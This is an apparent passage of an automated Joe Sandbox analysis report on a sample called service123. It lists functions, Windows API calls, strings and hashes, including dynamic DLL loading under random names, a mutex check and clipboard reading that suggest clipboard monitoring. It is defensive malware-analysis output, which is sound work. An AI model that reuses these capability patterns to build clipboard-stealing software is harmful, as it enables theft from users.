Failed to get function address. Error code: %d, xrefs: 002D82E0
uAGceqKEYCLcAMToCLcAMToKQDI.dll, xrefs: 002D824A

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$uAGceqKEYCLcAMToCLcAMToKQDI.dll$yvOEQDJQAYmjmcCBIBxD
API String ID: 145871493-3685625585
Opcode ID: bbd57be16eea5f21317d8736c0bb66f0eaeb1640034c670c94373607edcc5e95
Instruction ID: 0da008bccb5a533764a13c75ec2cdfefb9cf7cd57ccd8e0d562580fce9147f49
Opcode Fuzzy Hash: bbd57be16eea5f21317d8736c0bb66f0eaeb1640034c670c94373607edcc5e95
Instruction Fuzzy Hash: FB31A471D296419FDB00BF74ED4D95ABBF4EB85300F01892AE84583304EB75DD65CB92

Function 002D8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,002D138E,?,?,00006EA2,002D138E), ref: 002D8271
GetProcAddress.KERNEL32 ref: 002D828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,002D138E,?,?,00006EA2,002D138E), ref: 002D829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,002D138E,?,?,00006EA2,002D138E), ref: 002D82BD
GetLastError.KERNEL32 ref: 002D82DA
FreeLibrary.KERNEL32 ref: 002D82F3

Strings

yvOEQDJQAYmjmcCBIBxD, xrefs: 002D827E
uAGceqKEYCLcAMToCLcAMToKQDI.dll, xrefs: 002D824A
Failed to load DLL. Error code: %d, xrefs: 002D82C3

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$uAGceqKEYCLcAMToCLcAMToKQDI.dll$yvOEQDJQAYmjmcCBIBxD
API String ID: 1397630947-2905934638
Opcode ID: 133d8b720f514376a20de666f1625fb5c98ba5bf6ecd5dc73d6826b22b62f11d
Instruction ID: d15f2d5c1726915af573380cac6278da37b45f9caaca34e3e2b0e19bea8aeee8
Opcode Fuzzy Hash: 133d8b720f514376a20de666f1625fb5c98ba5bf6ecd5dc73d6826b22b62f11d
Instruction Fuzzy Hash: CF11B6729256419FDB00BFB4ED4D65E7BA0EB45300F10862AD85987354FF72DD258A82

Function 002D13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 002D1238
__p__acmdln.MSVCRT ref: 002D1261
malloc.MSVCRT ref: 002D12EB
strlen.MSVCRT ref: 002D1323
malloc.MSVCRT ref: 002D132E
memcpy.MSVCRT ref: 002D1344
_amsg_exit.MSVCRT ref: 002D13EA
_initterm.MSVCRT ref: 002D140C

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: 6ce7c83559e98266cfe66af13e048d7d8b5d860dfe9224b52f931e19cb3008aa
Instruction ID: 08921c74b5bacdba669dba8b253503eb99d27ebdc156cbc561dee383cdbfe1c7
Opcode Fuzzy Hash: 6ce7c83559e98266cfe66af13e048d7d8b5d860dfe9224b52f931e19cb3008aa
Instruction Fuzzy Hash: 5D4105B0A157119FDB10EF64E888369BBE0BB84302F10852FD98997711D7759C65CF42

Function 002D11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 002D11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 002D1238
__p__acmdln.MSVCRT ref: 002D1261
malloc.MSVCRT ref: 002D12EB
strlen.MSVCRT ref: 002D1323
malloc.MSVCRT ref: 002D132E
memcpy.MSVCRT ref: 002D1344
_amsg_exit.MSVCRT ref: 002D13EA
_initterm.MSVCRT ref: 002D140C

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: 6d059d0c61703c885784b6bb76c88c45b1dd0e897ffdc3bd0c5709501b052e59
Instruction ID: 080d31c19e0002a253c885046906763418b8f293b13f6f32b5b97461300ef8b4
Opcode Fuzzy Hash: 6d059d0c61703c885784b6bb76c88c45b1dd0e897ffdc3bd0c5709501b052e59
Instruction Fuzzy Hash: B74128B0E157019BDB10EFA4E88836DBBE0BB84301F10852FD8898B750D7749C66CF91

Function 002D1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 002D11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 002D1238
__p__acmdln.MSVCRT ref: 002D1261
malloc.MSVCRT ref: 002D12EB
strlen.MSVCRT ref: 002D1323
malloc.MSVCRT ref: 002D132E
memcpy.MSVCRT ref: 002D1344
GetStartupInfoA.KERNEL32 ref: 002D1433

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 71e6f91a6ef67c9dd6088ed5a4643481430c5596aea46ec9f20468d57a4334e8
Instruction ID: 2e9b745776eda770a94aa439d2852d5e342718522f5a070e30536d5d826d1a7a
Opcode Fuzzy Hash: 71e6f91a6ef67c9dd6088ed5a4643481430c5596aea46ec9f20468d57a4334e8
Instruction Fuzzy Hash: 45514A71E156019FDB10DFA8E88876ABBF0BB88301F10852FD9449B710D770AC65CF91

Function 6C3B4230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C3B4259
CreateMutexA.KERNELBASE ref: 6C3B42A3
Sleep.KERNELBASE ref: 6C3B42BF
GetClipboardSequenceNumber.USER32 ref: 6C3B42C8

Strings

xsBddhclvCKPtYMSTzPC, xrefs: 6C3B4242, 6C3B428C

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: xsBddhclvCKPtYMSTzPC
API String ID: 3689039344-3074595576
Opcode ID: a6c57693560c2b1ee2e8324b5ccaf26370da5c64c604615e769a84e3367ddc61
Instruction ID: f5a6816b2d50996c95c4eb63543837c695e87d342a6d76592eeff4080a803df8
Opcode Fuzzy Hash: a6c57693560c2b1ee2e8324b5ccaf26370da5c64c604615e769a84e3367ddc61
Instruction Fuzzy Hash: A601D2756483068FDB00FF68C64975BBFF4AB55344F01891CE98997640EB75A049CFA2

Function 002D1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 002D12EB
strlen.MSVCRT ref: 002D1323
malloc.MSVCRT ref: 002D132E
memcpy.MSVCRT ref: 002D1344

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 30d6523d61b22ea21ad876cb7bb123697089e427615c9b576c979087bd77e5ca
Instruction ID: 3435dd1145ee24b209e04b01457db9ec688d1376b278e188f95513796acc47cf
Opcode Fuzzy Hash: 30d6523d61b22ea21ad876cb7bb123697089e427615c9b576c979087bd77e5ca
Instruction Fuzzy Hash: BB312475E067169FCB10DF64E888369BBF1BB88301F15852ED94897311D731AC26CF81

Function 002D13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 002D12EB
strlen.MSVCRT ref: 002D1323
malloc.MSVCRT ref: 002D132E
memcpy.MSVCRT ref: 002D1344

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 2e65512f7ee943420798d8aac1857adeea49fffa0313f9ac4ad58668e1fc4157
Instruction ID: 4b7cd633e123ee0f7f678a2f7ed93fcc346d9390725f5c16ee44d469c9c7cd7f
Opcode Fuzzy Hash: 2e65512f7ee943420798d8aac1857adeea49fffa0313f9ac4ad58668e1fc4157
Instruction Fuzzy Hash: 2C21D3B5E067158FCB14DF64E884669BBF1BB88301F11892ED948A7310D730AD56CF81

Function 6C2FB1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4beed04a0808cb8e9f01f7c21367848a8974d4a1c16d5d1e094eb8ad2e2f8cf
Instruction ID: 198a4483c2b286a1dc3c2c1622b281263bef825d3c965038da72993cc96e0959
Opcode Fuzzy Hash: f4beed04a0808cb8e9f01f7c21367848a8974d4a1c16d5d1e094eb8ad2e2f8cf
Instruction Fuzzy Hash: D8519AB5A4530ACFC700DF69D08051AFBF4FF95318B548569E8689BB14E730E905CFA6

Function 6C2FB310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8885a1d19adb38a887d472dcfa5d396f552d945dae1fb478a1cc55c9a4e43f3b
Instruction ID: 45baf17798ce9343e8199ba98efa7803faedb5966a6f7be2041ec1a74a536ae2
Opcode Fuzzy Hash: 8885a1d19adb38a887d472dcfa5d396f552d945dae1fb478a1cc55c9a4e43f3b
Instruction Fuzzy Hash: 2F31D17178530ACFDB149F28C4C064AF7B9BB66318B984678DD208BF59E770D4068B66

Non-executed Functions

Function 6C2ECD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2ECD7D

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 4bd0f61be5831cde9e372d253ee0acfd3d60c4f96e6a64a509b52bf28e8fc35f
Instruction ID: 900f64f8666ab2e8192478bdd38df98f9c0b91f25e662138d353b14e88ccaf0e
Opcode Fuzzy Hash: 4bd0f61be5831cde9e372d253ee0acfd3d60c4f96e6a64a509b52bf28e8fc35f
Instruction Fuzzy Hash: 7A02297150875A8FD700CF29C044795FFE2AF8A318F4D826EECA86B791C776A549CB81

Function 6C2F0FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C2F0FCA
strlen.MSVCRT ref: 6C2F0FD4

Strings

, xrefs: 6C2F240F
!, xrefs: 6C2F2C08
5, xrefs: 6C2F14D2
inity, xrefs: 6C2F1E21

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: 3cb7676dd4d18bb22c8d9cfde2d4c013db566b79e2e03b15899c43f9d1f32112
Instruction ID: 1071fb3bcf564d3e7b157f0ed3d08e0f0d654ccaaec2bfb9c703d70cba26cb45
Opcode Fuzzy Hash: 3cb7676dd4d18bb22c8d9cfde2d4c013db566b79e2e03b15899c43f9d1f32112
Instruction Fuzzy Hash: 2BF248B5A483898FD720CF29C48475EFBE0BF8A308F51891DE8E997750D775E8468B42

Function 6C368280 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

rand_s, xrefs: 6C368467
rdseed, xrefs: 6C3682C8
Genu, xrefs: 6C36841E
rdrand, xrefs: 6C368358
Auth, xrefs: 6C368397
random_device::random_device(const std::string&): unsupported token, xrefs: 6C368482
rdrnd, xrefs: 6C3683C8
hardware, xrefs: 6C368450
Auth, xrefs: 6C368426
Genu, xrefs: 6C36838F
Auth, xrefs: 6C3682FF
Genu, xrefs: 6C368307
default, xrefs: 6C36829F
random_device::random_device(const std::string&): device not available, xrefs: 6C368348

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: 7191e95237f81b8558f96f692803ee870888e39bff14e15f2785c15e5a058fe4
Instruction ID: fa87607e7fa0dfcde8b0892d7113e82eb348770c14aeec3fc42849eb9eb7f5b4
Opcode Fuzzy Hash: 7191e95237f81b8558f96f692803ee870888e39bff14e15f2785c15e5a058fe4
Instruction Fuzzy Hash: FE413AFA3193414BE300AA3AD48131A76A6B74631CF30493ED8819BF95E736D855CF63

Function 6C2EEE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2EF18B
malloc.MSVCRT ref: 6C2EF1A8

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 50d2a289790f70b4ca004dba8f7ac53b25256247f4a5ea3587658da797ffec41
Instruction ID: 1f9b2bc9063f29fcdd9f8f9f0861b212d7ece929950ad7b994cc51d04b7e160a
Opcode Fuzzy Hash: 50d2a289790f70b4ca004dba8f7ac53b25256247f4a5ea3587658da797ffec41
Instruction Fuzzy Hash: 38125A7560874A8FC714CF19D08065AB7E2BFC8318F958A2DEC99A7B54D730ED09CB92

Function 6C30E490 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C30E4BA
strlen.MSVCRT ref: 6C30E52A

Strings

basic_string: construction from null is not valid, xrefs: 6C30E61F, 6C30E670, 6C30E6C0
basic_string: construction from null is not valid, xrefs: 6C30E4F2, 6C30E562, 6C30E5D2

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 11f3da2c2a6f69beb6438563126b7c447a89fdef9b7d001e52fd419e854ebcfa
Instruction ID: 4d63c96a429d31899992a5953ef2a3493735539b3477b55f69a2e9175c8b3fbf
Opcode Fuzzy Hash: 11f3da2c2a6f69beb6438563126b7c447a89fdef9b7d001e52fd419e854ebcfa
Instruction Fuzzy Hash: 17615DF2B057148FCB00BF2CD48589ABBE4BB55618F06496DE8C49B715E231E899CF92

Function 6C300610 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C300636
memcmp.MSVCRT ref: 6C300659
memcmp.MSVCRT ref: 6C3006CF
memcmp.MSVCRT ref: 6C300741

Part of subcall function 6C3AAB60: strlen.MSVCRT ref: 6C3AAB6E

memcmp.MSVCRT ref: 6C3007D5

Strings

basic_string::compare, xrefs: 6C300678, 6C3006EC, 6C30075F, 6C3007F4, 6C300810
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C300680, 6C3006F4, 6C300767, 6C3007FC, 6C300818

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 14c5d306d9ea45dcde46bd661a28d5a2fba909e12b9eddc8a61c38930fd86343
Instruction ID: b54fedbf5fbafab3e7a49d9660a9f8591b3a53bf049eb31f0057fcdf6e5fefa3
Opcode Fuzzy Hash: 14c5d306d9ea45dcde46bd661a28d5a2fba909e12b9eddc8a61c38930fd86343
Instruction Fuzzy Hash: E761387A7093089FC304AF69C88045AFBE6EFD8B94F54892DE8C897710D631E885CF52

Function 6C2F9B99 Relevance: 10.6, APIs: 7, Instructions: 81clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 6C2F9BA0
GetClipboardData.USER32 ref: 6C2F9BE7
GlobalLock.KERNEL32 ref: 6C2F9BF9
GlobalUnlock.KERNEL32 ref: 6C2F9C1A
CloseClipboard.USER32 ref: 6C2F9C23

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: e4d0a19f4141d6cbcf839bb7050b774f576020bbcb293d89d4947b3323782c71
Instruction ID: d2fdf009735059dabc3a98de7ef1c4300833c9b1f5548dc243f8bf89b722c41b
Opcode Fuzzy Hash: e4d0a19f4141d6cbcf839bb7050b774f576020bbcb293d89d4947b3323782c71
Instruction Fuzzy Hash: D3217FB57882058FDB00FF7CC64821EBBF0AB59205F444A2CE88586644EB35D419CF93

Function 6C2F70C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C2F70C7
memset.MSVCRT ref: 6C2F7217

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
